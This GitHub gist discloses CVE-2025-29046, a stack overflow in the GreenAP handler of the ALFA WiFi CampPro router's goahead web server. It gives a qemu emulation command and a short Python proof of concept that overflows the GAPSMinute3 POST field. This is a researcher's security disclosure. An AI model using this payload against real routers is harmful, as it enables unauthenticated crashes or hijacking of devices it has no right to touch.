Skip to content

Instantly share code, notes, and snippets.

@xyqer1

xyqer1/ALFA-WiFi-CampPro-GreenAP-GAPSMinute3.md

Last active April 17, 2025 09:06
Show Gist options

  • Select an option

    Learn more about clone URLs
  • Save xyqer1/7f9970240aec0af412caee79271a5be5 to your computer and use it in GitHub Desktop.

Select an option

Learn more about clone URLs
Save xyqer1/7f9970240aec0af412caee79271a5be5 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
ALFA-WiFi-CampPro-GreenAP-GAPSMinute3.md

ALFA WiFi CampPro-GreenAP-GAPSMinute3

Vulnerability Details

  • Affected Firmware: ALFA_CAMPRO-co-2.29
  • CVE-ID: CVE-2025-29046
  • Root Cause: By analyzing the goahead file in the bin directory, I found that the function GreenAP contains a stack overflow vulnerability.
  • Impact: Remote unauthenticated attackers can hijack the program's control flow.

Vendor Information

During my internship at Qi An Xin Tiangong Lab, I discovered a stack overflow vulnerability in the ALFA WiFi CampPro router.

By analyzing the goahead file in the bin directory, I found that the function GreenAP contains a stack overflow vulnerability.

The stack overflow can be triggered by the GAPSMinute3 key value, which leads to a sprintf stack overflow.

image-20250306144602006

How can we simulate a router

Use the following command to simulate with qemu-mipsel-static.

sudo qemu-mipsel-static -L ./ ./bin/goahead

The content of the poc.py file is as follows:

import requests
url = "http://127.0.0.1/goform/GreenAP"
data = {
        "GAPSMinute3": "a"*0x100
}

res = requests.post(url,data=data)
print(res.text)

Attack result

image-20250306145423116

One can see that his stack space is 0x100.

image-20250306145412353

After execution, it overflows to 0x0x14c. If you want to overflow more, you can modify the GAPSMinute3 key value in the code.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment